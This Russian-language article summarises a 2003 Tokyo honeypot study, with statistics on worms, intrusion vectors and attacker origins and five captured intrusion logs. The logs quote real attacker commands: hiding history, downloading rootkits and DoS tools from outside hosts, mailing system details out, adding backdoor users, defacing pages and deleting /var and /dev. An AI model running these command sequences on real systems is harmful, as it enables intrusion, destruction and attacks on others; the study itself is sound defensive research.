• Партнер

  • Sombria (Shadowy, затененный с португальского) - honeypot,
    развернутый в столице Японии, Токио. Его
    основной целью, собственно как и в случае
    всех ловушек, стал сбор информации о
    способах проникновения хакеров, так
    сказать добывания меда из улья. Авторы Sombria
    наблюдали за действиями взломщиков и
    записывали все их действия. В состав Sombria
    входил web-сервер, файрвол и IDS, системы
    обнаружения вторжений. IDS срабатывала при
    проникновении, все команды записывались
    для последующего анализа, файрвол отсекал
    все попытки хакера использовать Sombria в
    качестве базы для атаки против других
    систем.

    Система работала с 10 Мая по 31 Июля и сейчас
    в Инет выложены все сведения, собранные
    системой за время существования. Сначала -
    некоторая статистика, потом -
    примеры взлома по командам.

    Атаки червей

    Лидирует Code Red и его модификации, за ним
    идет Slapper и его варианты, примерно наравне с
    ним идет еще один червь - Slammer. ну и замыкает
    тройку Nimdfa. Отмечу, что распределение по
    времени атак червей не совсем равномерно,
    например активность Nimda в середине жизни Sombria
    почти сошла на нет, в общем все черви кроме
    Code Red  значительно колебались в своих
    попытках взломать подопытную систему.

    Сбор информации

    Для простоты картины приведу график, в
    котором авторы объединили все виды
    сканирования и разбиты по датам.

    • Port Scan - сканирование портов. Второе,
      наверное, действие нападающего после
      традиционного пинга. 
    • OpenSSL Mas Scan - попытка определить дырявость
      апача.
    • ICMP Echo Request - тот самый пинг.
    • Other - прочие попытки выяснить сущность
      подопытного, например SNMP или RPC запросы.

    Проникновение

    За время существования Honeypot'а
    наблюдателями было отмечено 131
    проникновение в систему. 

    • На первом месте идет взлом через Samba 2.2.3,
      дырка в программе позволяет выполнять
      произвольный код на системе и получать
      root'а.
    • На втором  - Apache 1.3.23 + Open SSL 0.9.6b. как и в
      предыдущем случае баг позволяет
      выполнять с системой все, что угодно.
    • Третье место принадлежит SSH - после
      взлома хакеры тупо добавляли
      пользователя в систему и уже дальше
      входили под ним.
    • Ну и меньше всего ломились в Sombria при
      помощи Backdoor'ов - мало кто оставлял за
      собой нестандартную лазейку для
      дальнейшего входя.

    День и время

    Оказывается, самый хороший день для
    хакера - суббота. может просто у всех
    выходной, а может просто умные люди
    рассчитывают на то, что админ отдыхает... На
    втором месте вторник, а на третьем среда.
    Что же качается времени, то ломятся в
    основном утром - часов в 7-8, или вечером - с 20
    до 22, или ночью - 0 до 3.

    Что делают

    После проникновения в Sombria и получения
    привилегированного доступ большинство
    делает следующее:

    • Пытается загрузить руткит, эксплоит, DoS
      утилитку или программу для работы с IRC
      через ftp или http. Самые популярные тулзы:
      sslroot, config-jp, ptrace-kmod, psybnc и rk.
    • Устанавливает программу через SSH, что
      препятствует анализу трафика.
    • После установки дальше все развивается
      по стандартной схеме - попытка атаки на
      другой хост при помощи скачанных утилит.
    • Еще один логический ход - попытка
      модификации или удаления системных
      файлов.

    Откуда и зачем

    Как ни странно, но большинство хакеров, оказывается,
    проживает в Польше, именно там живет 22% из
    всех, пытавшихся взломать Sombria. Не слишком
    отстает Румыния - 19%, на третьем месте Япония,
    на четвертом - Малайзия. Удивительно, но России
    в десятке вообще нет.

    Удивительно, но мотивы большинства
    нападавших админы так и не смогли
    установить. Зачем они взламывали систему
    для них осталось загадкой - после
    проникновения они не сдали делать ничего
    серьезного, почти треть на этом и
    остановилась - 31%. Второй по популярности
    вариант - атака других хостов, этим занялись
    27%. 23% просто попытались разрушить сервер Sombria,
    видимо деструктивное начало живо не только
    в русских скрипткиддиз, но и в польских и
    румынских... Ну и 19% попытались установить IRC
    боунсер.

    Как

    Вот мы и подошли к самому интересному, к
    разбору реальных нападений. 

    Вариант А: нападение

    Инцидент случился 3 Июня в 10:50. Чувак
    проник в систему через дыру в Samba с машины,
    расположенной в Штатах. Получив рута он
    попытался скачать и установить руткиты:

    |20722|0|sh|unset HISTFILE;uname -a;w;id;
    |20722|0|sh|wget www.xxxxxxxxxxxxx.as.ro/george.tgz
    |20722|0|sh|tar zxvf george.tgz
    |20722|0|sh|cd sk-1.3b
    |20722|0|sh|./inst
    |20722|0|sh|cd /usr/man/man3/.inf
    |20722|0|sh|./sk
    |20722|0|sh|wget www. xxxxxxxxxxxxx.as.ro/nick.tar.gz
    |20722|0|sh|tar zxvf nick.tar.gz
    |20722|0|sh|cd nick
    |20722|0|sh|./install

    Всего через минуту чел вернулся к Sombria уже
    с компьютера в Румынии и закачал еще софт,
    включая psybnc.

    |26481|0|initdl|SSH-1.5-PuTTY-Release-0.53b
    |26813|0|bash|cat /etc/issue
    |26813|0|bash|killall -9 smbd
    |26813|0|bash|cd /usr/man/man3/.inf
    |26813|0|bash|ps aux
    |26813|0|bash|wghet wget www.xxxxxxxxx.com/xxxxxxxx/ psybnc.tgz
    |26813|0|bash|ftp
    |27425|0|ftp|open ftp.xxxxxxxxxxxxx.as.ro
    |27425|0|ftp|bin
    |27425|0|ftp|get CryBaby.tar.gz
    |27425|0|ftp|get rh.gz
    |27425|0|ftp|bye

    Хакер запустил сниффер, который заменил
    стандартный SSH и удалил все логи из /var, стер
    все файлы в /dev. Это не позволило
    наблюдателям дальше отслеживать действия
    хакера и ловушка была отключена от сети.

    |26813|0|bash|./sshsniff
    |26813|0|bash|ps aux
    |26813|0|bash|cd /var
    |26813|0|bash|rm -rf var
    |26813|0|bash|cd ..
    |26813|0|bash|rm -rf /dev

    Вариант Б: загрузка

    Еще один взломщик из Польши проник
    систему через ту же дырку, что и предыдущий.
    Он попытался загрузить программы для
    организации DoS атаки (config-jp и smurf.c), но
    обломался:

    |25295|0|sh|unset HISTFILE; echo "*** JE MOET JE MUIL HOUWE";uname -a;id;
    |25295|0|sh|uptime
    |25295|0|sh|wget http://www.xxxxx.xx.pl/xxxxxxx/config-jp
    |25295|0|sh|ps aux
    |25295|0|sh|wget http://www.xxxxx.xx.pl/xxxxxxx/config-jp
    |24498|0|sh|unset HISTFILE; echo "*** JE MOET JE MUIL HOUWE";uname -a;id;
    |24498|0|sh|wget http://xxxxx.xxx.xxx.es/xxx/progs/xxxxxx/exploits/DoS/smurf.c

    Вернувшись через 4 дня он еще 5 раз пытался
    загрузить config-jp, но все мимо... Отчаявшись он
    решил прибегнуть к пингу и зафлудить другой
    хост ICMP пакетами, но и это не удалось:

    |32510|0|sh|unset HISTFILE; echo "*** JE MOET JE MUIL HOUWE";uname -a;id;
    |32510|0|sh|ping -f xxx.xx.xxx.xx&

    Позже он еще несколько раз пытался
    скачать свою несчастную программу,
    запинговать сторооний адрес, но ничего не
    получалось... Спустя три с половиной недели
    он покинул систему.

    Вариант В: дефейс

    8 Июня в систему проник еще один перец. Он
    использовал SSH и неудачно попытался
    отдефейсить сайт, скачать ptrace для повышения
    привилегий:

    |30416|0|sshd|SSH-2.0-OpenSSH_3.1p1
    |30417|37|bash|su vadmin
    |30417|37|bash|cd /var/www
    |30417|37|bash|cd html
    |30417|37|bash|ls
    |30417|37|bash|mv index.html test.html
    |30417|37|bash|echo I Was Here ... Mihai >> index.html
    |30417|37|bash|cat /etc/passwd
    |30417|37|bash|gcc
    |30417|37|bash|cd /tmp
    |30417|37|bash|wget www.xxxxx.org/ptrace-kmod.c.txt ;mv ptrace-kmod.c.txt ptrace-kmod.c
    |30417|37|bash|ls
    |30417|37|bash|wget www. xxxxx.org/ptrace-kmod.c.txt
    |30417|37|bash|exit

    Через минуту он вернулся через Samba и
    теперь все получилось:

    |30460|0|sh|uname -a>>/slamet; id>>/slamet; cat /slamet |mail -s "Samba Inf" xxxxxxxxxxxxx@xxxxx.com;
    |30460|0|sh|unset HISTFILE; echo "*** JE MOET JE MUIL HOUWE - qe3 ";uname -a;id;
    |30460|0|sh|cd /var/www
    |30460|0|sh|cd html
    |30460|0|sh|mv index.html test.html
    |30460|0|sh|echo Touched By Mihai >> index.html
    |30460|0|sh|cd /etc
    |30460|0|sh|rm -rf aad
    |30460|0|sh|rm -rf psybnc
    |30460|0|sh|cd /var/www/html/manual/mod/mod_ssl/
    |30460|0|sh|echo Touched By ....Mihai >> index.html
    |30460|0|sh|mv index.html ttest.html
    |30460|0|sh|echo Touched By Mihai >> index.html

    Вариант Г: остановка Samba

    Проник снова через Samba, добавил
    пользователя:

    |30996|0|sh|unset HISTFILE;uname -a;w;id;
    |30996|0|sh|wget www. xxxxxxx.as.ro/snik.tar
    |30996|0|sh|cat /etc/issue
    |30996|0|sh|cat /etc/passswd
    |30996|0|sh|/usr/sbin/adduser httpd
    |30996|0|sh|passwd httpd

    и войдя снова по SSH попытался остановил
    службу:

    |2412|0|sshd|SSH-1.5-PuTTY-Release-0.53b
    |5301|500|bash|cd /ls –a
    |5301|500|bash|w
    |5301|500|bash|ftp 217.215.***.**
    |5301|500|bash|ftp 193.231.***.**
    |5301|500|bash|wget www. xxxxxxxxx.com/xxxxxxxxxxxxxxx/mech.tgz
    |5301|500|bash|cd /etc/init.d
    |5301|500|bash|ls –a
    |5301|500|bash|./smb stop

    однако это не получилось в связи с недостаточностью
    привилегий.

    2003/06/08-07:36:21 |2412|0|sshd|SSH-1.5-PuTTY-Release-0.53b
    2003/06/08-07:37:44 |5301|500|bash|cd /ls –a
    2003/06/08-07:37:44 |5301|500|bash|w
    2003/06/08-07:39:12 |5301|500|bash|ftp 217.215.***.**
    2003/06/08-07:40:48 |5301|500|bash|ftp 193.231.***.**
    2003/06/08-07:44:27 |5301|500|bash|wget www. xxxxxxxxx.com/xxxxxxxxxxxxxxx/mech.tgz
    2003/06/08-07:46:48 |5301|500|bash|cd /etc/init.d
    2003/06/08-07:48:59 |5301|500|bash|ls –a
    2003/06/08-07:49:12 |5301|500|bash|./smb stop

    еще одна попытка и Samba остановлена:

    |2412|0|sshd|SSH-1.5-PuTTY-Release-0.53b
    |5301|500|bash|cd /ls –a
    |5301|500|bash|w
    |5301|500|bash|ftp 217.215.***.**
    |5301|500|bash|ftp 193.231.***.**
    |5301|500|bash|wget www. xxxxxxxxx.com/xxxxxxxxxxxxxxx/mech.tgz
    |5301|500|bash|cd /etc/init.d
    |5301|500|bash|ls –a
    |5301|500|bash|./smb stop

    Вариант Д: сканирование

    Хакер загрузил руткит rk и установил его:

    |13113|0|sh|unset HISTFILE; echo "*** JE MOET JE MUIL HOUWE";uname -a;id;
    |13113|0|sh|cd /var/tmp
    |13113|0|sh|wget www.xxxxxxxxx.com/xxxxxxxxxx/rk.tgz
    |13113|0|sh|tar -xzvf rk.tgz
    |13113|0|sh|rm -rf rk.tgz
    |13113|0|sh|cd rk
    |13113|0|sh|./setup 6676 6676 xxxxxxxx@xxxx.com

    После этого он попытался получить доступ
    к Sombria с четырех машин в Румынии и стянуть
    оттуда файлы: apal, samba, sslmass2,
    psyBNC2.3, rh73, wu, x8, s и selena. Затем была попытка
    организовать атаку против других хостов:

    |17262|0|ssh2d|SSH-1.5-PuTTY-Release-0.53b
    |17264|0|bash|cd /tmp
    |17264|0|bash|wget xxxxxxxx.net/apal.tgz
    |17264|0|bash|tar zxvf apal.tgz
    |17264|0|bash|cd apal
    |17264|0|bash|./scan xxx.xxx
    |17264|0|bash|cd ..
    |17264|0|bash|wget www.xxxxxxxxx.net/sslmass2.tgz
    |17264|0|bash|tar zxvf sslmass2.tgz
    |17264|0|bash|cd sslmass2
    |17264|0|bash|./sslmass xxx.xxx.*.*
    |17264|0|bash|cd ..
    |17264|0|bash|wget www.xxxxx.xxxx.ro/selena.tgz
    |17264|0|bash|wget www. xxxxxxxxxxxx.net/x8.tar.gz
    |17264|0|bash|cd wu
    |17264|0|bash|./startwu xx.xxx.xx.xxx
    |17264|0|bash|cd ..
    |17264|0|bash|cd apal
    |17264|0|bash|./scan xxx.xxx

    и еще раз

    |17338|0|ssh2d|SSH-1.5-PuTTY-Release-0.53b
    |17340|0|bash|cd /tmp
    |17340|0|bash|cd sslmass2
    |17340|0|bash|./httpver xxx.xxx.xxx.xxx
    |17340|0|bash|./sslmass xx.xxx.*.*
    |17340|0|bash|./sslmass xx.xxx.*.*
    |17340|0|bash|cd ..
    |17340|0|bash|cd wu
    |17340|0|bash|cd ..
    |17340|0|bash|cd apal
    |17340|0|bash|./scan xx.xxx
    |17340|0|bash|id
    |17340|0|bash|./samba xx.xxx
    |17340|0|bash|./scan xx.xxx.*.*

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии